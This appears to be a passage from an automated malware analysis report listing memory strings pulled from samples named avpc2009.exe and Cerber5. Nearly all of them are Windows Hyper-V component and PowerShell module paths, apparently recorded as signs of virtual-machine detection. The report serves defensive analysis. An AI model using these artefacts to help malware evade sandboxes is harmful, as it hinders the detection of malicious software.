          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug.resources_31bf3856ad364e35_10.0.17134.1_en-us_8e782c7a46f14b49
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.17134.1_en-us_f27d2f48e22200a4v^
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vhd-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_0b749ee450213385E
          Source: avpc2009.exe, 00000019.00000003.697105730.0000000005B88000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.689950909.0000000005B79000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.687092295.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.639678148.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.606856071.0000000003B17000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698345572.0000000005B88000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.641209672.0000000003B60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.17134.1_none_58d19a03c592a9cb*
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.17134.1_none_e99c08352e0bfafa
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp.resources_31bf3856ad364e35_10.0.17134.1_en-us_662e0a371a2edd22I
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..nthfcvdev.resources_31bf3856ad364e35_10.0.17134.1_en-us_9c3432f847f5f8f0|eS
          Source: avpc2009.exe, 00000019.00000003.691717156.0000000003AE5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\wow64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.17134.1_none_c77057abb7bb80d35{
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.613926136.0000000005B93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0#Ht
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.17134.1_none_7338804b0eb50c172de
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-lun-parser_31bf3856ad364e35_10.0.17134.1_none_e6683e9b0956ac05b44
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa.resources_31bf3856ad364e35_10.0.17134.1_en-us_461210c45e54cb44
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.694580301.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.17134.1_none_e636218254eba71f)
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.17134.1_en-us_f27d2f48e22200a4-
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-tpm.resources_31bf3856ad364e35_10.0.17134.1_en-us_259560ef1632af7bdd45\*
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.1_none_15d1dfb8ceafada1h
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-lun-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_15c27a1250ea6310
          Source: Endermanch@Cerber5.exe, 00000010.00000002.586235640.00000000015E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vpmem.resources_31bf3856ad364e35_10.0.17134.1_en-us_83c966966d5f8cf2
          Source: avpc2009.exe, 00000019.00000003.691717156.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.693897519.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.608752993.0000000003AF8000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.608208585.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.593999186.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.613926136.0000000005B93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \Hyper-V\1.1
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.17134.1_none_c0dbf3b2f0877a05o
          Source: avpc2009.exe, 00000019.00000003.694055083.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.638786570.0000000003A8D000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.639617349.0000000003A9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.17134.1_none_e636218254eba71f3cH
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.17134.1_en-us_2b9c39681a7206ff
          Source: avpc2009.exe, 00000019.00000003.608752993.0000000003AF8000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.608208585.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.593999186.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0H
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-rdv_31bf3856ad364e35_10.0.17134.1_none_6054528c8a07dd45
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..omputelib.resources_31bf3856ad364e35_10.0.17134.1_en-us_a1cfee3fcfcbe4d8X
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vpcivdev_31bf3856ad364e35_10.0.17134.1_none_7873076add237d80
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.613926136.0000000005B93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Internationals\Hyper-V\*fJ7
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.17134.1_none_c35bb6c84d5e4ad0-I$
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.17134.1_none_7743eea1a413bb8cP^
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.17134.1_none_2457e84548829177Hd
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.17134.1_none_84e0eedae46f7b9b9J(
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.17134.1_none_6efae9ae437759d8/K&
          Source: avpc2009.exe, 00000019.00000003.697105730.0000000005B88000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.689950909.0000000005B79000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.639678148.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698345572.0000000005B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.13
          Source: avpc2009.exe, 00000019.00000003.645751546.0000000003A9D000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.638786570.0000000003A8D000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.639617349.0000000003A9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V\1.1
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.691717156.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.613926136.0000000005B93000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647199056.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.638559464.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.701531743.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.648908567.0000000003AE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-rdv_31bf3856ad364e35_10.0.17134.1_none_6054528c8a07dd45`K
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.697105730.0000000005B88000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.589382276.0000000005B77000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.689950909.0000000005B79000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.687092295.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.639678148.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.613926136.0000000005B93000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.606856071.0000000003B17000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698345572.0000000005B88000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.590799442.0000000003A9A000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.641209672.0000000003B60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-p..ru-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_d16dce7672841ddd
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.17134.1_none_58d19a03c592a9cb
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.17134.1_none_b7de7159233ab503~
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..lebrowser.resources_31bf3856ad364e35_10.0.17134.1_en-us_73034f3cf79a1975
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vhd-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_0b749ee450213385
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.17134.1_none_18c6a9392dd7eb3e
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..lebrowser.resources_31bf3856ad364e35_10.0.17134.1_en-us_73034f3cf79a197505\*
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-socket-provider_31bf3856ad364e35_10.0.17134.1_none_f5d736b78ec0a239n
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..apinabout.resources_31bf3856ad364e35_10.0.17134.1_en-us_02a473bf02f2a824
